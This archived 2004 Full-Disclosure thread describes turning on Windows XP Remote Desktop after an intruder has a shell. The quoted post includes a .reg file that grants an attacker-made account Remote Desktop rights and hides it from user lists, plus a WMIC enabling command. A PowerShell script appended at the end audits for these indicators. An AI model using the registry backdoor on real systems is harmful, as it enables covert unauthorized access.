Open Source and information security mailing list archives
From: fixer907 at gmail.com (Fixer)
Subject: XP Remote Desktop Remote Activation

Agreed, but you'll note that this will only turn it on for
Administrator, not for the user that you've created.  At the point
where you've gotten a remote shell (call it via lsass, dameware, or
whatever) you're sitting there in the SYSTEM context.  You've still
got to create the account and give it rights to RD.  Doing it that way
is only half the battle.  You could use VNC, but this way leaves less
of a footprint since you're using the built-in MS utils.

Fixer


On Sat, 2 Oct 2004 17:43:11 +0200, Dominick Baier
<seclists@...stprivilege.com> wrote:
> if you have an administrator password for the machine you can just use WMIC
> to turn remote desktop on.
> 
> wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" CALL SetAllowTSConnections 1
> 
> dominick
> www.leastprivilege.com
> 
> 
> 
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Fixer
> Sent: Saturday, 2 October 2004 06:51
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
> 
> XP Remote Desktop Remote Activation
> 
> Information
> ____________________________________________________________________
> Windows XP Professional provides a service called Remote Desktop, which
> allows a user to remotely control the desktop as if he or she were in front
> of the system locally (ala VNC, pcAnywhere, etc.).
> 
> By default, Remote Desktop is shipped with this service turned off and only
> the Administrator is allowed access to this service.  It is possible,
> however, to modify a series of registry keys that may allow a malicious user
> who has already gained a command shell to activate Remote Desktop and add a
> user they have created for themselves as well as to hide that user so that
> it will not show up as a user in the Remote Desktop user list.  The
> instructions for this are attached.
> Additionally, I have listed a sample .reg file of the type that is discussed
> in the instructions below.
> _____________________________________________________________________
> 
> Final Stuff
> 
> To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)
> 
> On to the exploit....   Fixer
> 
> _____________________________________________________________________
> 
> .reg file  (remember, the xx xx are the values you need to change)
> 
> Windows Registry Editor Version 5.00
> 
> [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
> "C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00,\
> 00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
> 01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
> 00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
> 00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
> 00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
> 00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
> 00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
> 00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
> 00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
> 6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
> 00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
> 20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
> 00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
> 67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
> 00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
> 00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00
> 
> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
> "fDenyTSConnections"=dword:00000000
> 
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
> "lus3r"=dword:00000000
> 
> (obviously change "lus3r" to the name of the account you created)
> 
>


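A defender-side audit of the three registry locations the post above touches (fDenyTSConnections, the Winlogon SpecialAccounts\UserList, and membership of the Remote Desktop Users alias). This is an added example, not code from the thread; it assumes PowerShell 5.1 or later on the audited Windows host, and the $expectedRdUsers allow-list is a constructed placeholder to adjust per environment.

```powershell
# Added audit example (not from the original post). Reports the indicators
# a host would show after the registry changes described in the thread.
function Test-RdpTampering {
    param(
        # Constructed placeholder: principals you expect in Remote Desktop Users.
        [string[]]$expectedRdUsers = @()
    )
    $findings = @()

    # 1. Remote Desktop switched on: the post sets fDenyTSConnections to 0.
    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections `
                -ErrorAction SilentlyContinue).fDenyTSConnections
    if ($deny -eq 0) { $findings += 'Remote Desktop enabled (fDenyTSConnections=0)' }

    # 2. Accounts hidden from the logon/user list via SpecialAccounts\UserList.
    #    A DWORD value of 0 under this key hides the named account.
    $ulKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    $hidden = @()
    if (Test-Path $ulKey) {
        $meta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
        foreach ($p in (Get-ItemProperty -Path $ulKey).PSObject.Properties) {
            if ($meta -contains $p.Name) { continue }   # skip provider metadata
            if ($p.Value -eq 0) {
                $hidden += $p.Name
                $findings += "Account hidden via SpecialAccounts\UserList: $($p.Name)"
            }
        }
    }

    # 3. Remote Desktop Users membership (the SAM alias the .reg file rewrites).
    #    Read through the local accounts API rather than the raw SAM hive.
    $members = Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue
    foreach ($m in $members) {
        if ($expectedRdUsers -notcontains $m.Name) {
            $findings += "Unexpected Remote Desktop Users member: $($m.Name) ($($m.SID))"
        }
        # A hidden account that can also log on via RD is exactly the pattern described.
        $short = ($m.Name -split '\\')[-1]
        if ($hidden -contains $short) {
            $findings += "HIGH: hidden account $short is in Remote Desktop Users"
        }
    }
    return $findings
}

$result = Test-RdpTampering -expectedRdUsers @('Administrators')  # placeholder list
if ($result) { $result | ForEach-Object { Write-Warning $_ } } else { 'No indicators found' }
```

Get-LocalGroupMember reports nested group names such as Administrators as members, so keep them in the allow-list rather than treating them as findings.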